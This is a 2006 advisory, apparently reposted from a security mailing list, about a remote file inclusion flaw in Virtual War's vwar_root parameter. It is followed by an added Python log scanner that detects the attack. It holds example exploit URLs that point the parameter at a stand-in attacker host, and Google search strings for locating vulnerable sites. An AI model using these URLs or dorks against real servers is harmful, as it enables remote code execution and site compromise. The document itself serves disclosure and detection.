Computer Security
[EN] securityvulns.ru




From::) :) <liz0_(at)_bsdmail.com>
Date:09.04.2006
Subject:Virtual War File Inclusion

Virtual War File Inclusion
---------------------------------
Site:http://www.vwar.de/
Demo:http://www.vwar.de/demo/

---------------------------------------
File Inclusion


// get functions
$vwar_root = "./";

require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");


Vwar_root parameter File inclusion

Aut File

war.php, stats.php, news.php, joinus.php, challenge.php, calendar.php, member.php, popup.php

and

all admin folder files

---------------------------------------
example

1)

http://victim.com/path/admin/admin.php?vwar_root=http://evilsite

2)(phpnuke module)

http://victim.com/path/modules/vwar/admin/admin.php?vwar_root=http://evilsite


-----------------------------------------
Credit:Liz0ziM
E-mail:liz0@bsdmail.com
Site:www.biyo.tk www.biyosecurity.be

-----------------------------------------
google:

"Powered by: Virtual War v1.5.0"

inurl:"modules.php?name=vwar"

-------------------------------------

Source:
http://www.blogcu.com/Liz0ziM/431925/
http://liz0zim.no-ip.org/vwar.txt
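
Added example (not part of the original advisory and not Virtual War code): a Python check for web-server access logs that flags any request supplying the vwar_root parameter named above, and marks the ones whose value is a URL or PHP stream wrapper. The combined log format, the constructed sample lines and the names classify and scan are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter named in the advisory. The application sets it in code ("./"),
# so a request that supplies it at all is worth a look.
PARAM = "vwar_root"
# Schemes/wrappers that make a PHP include path point at non-local content.
REMOTE = re.compile(r"^\s*(?:(?:https?|ftps?|php|expect)://|data:)", re.I)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return None, 'override' (parameter supplied) or 'remote' (value is a URL)."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    verdict = None
    # parse_qsl percent-decodes once, matching what the PHP side would see.
    query = urlsplit(m.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != PARAM:  # PHP variable names are case-sensitive
            continue
        if REMOTE.search(value):
            return "remote"
        verdict = "override"
    return verdict

def scan(lines):
    """Return (client address, verdict) for every flagged log line."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line.split()[0], verdict))
    return hits

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE = [
    '192.0.2.10 - - [09/Apr/2006:10:00:00 +0000] "GET /path/admin/admin.php?vwar_root=http://example.invalid/ HTTP/1.1" 200 512',
    '192.0.2.11 - - [09/Apr/2006:10:00:05 +0000] "GET /path/modules/vwar/admin/admin.php?vwar_root=http%3A%2F%2Fexample.invalid HTTP/1.1" 200 512',
    '192.0.2.12 - - [09/Apr/2006:10:00:09 +0000] "GET /path/war.php?vwar_root=../ HTTP/1.1" 200 100',
    '192.0.2.13 - - [09/Apr/2006:10:00:12 +0000] "GET /path/news.php?id=4 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE):
        print(client, verdict)
```

Only the query string is visible in an access log; a value sent in a POST body or cookie needs request-body logging or a WAF rule to be seen.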









© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod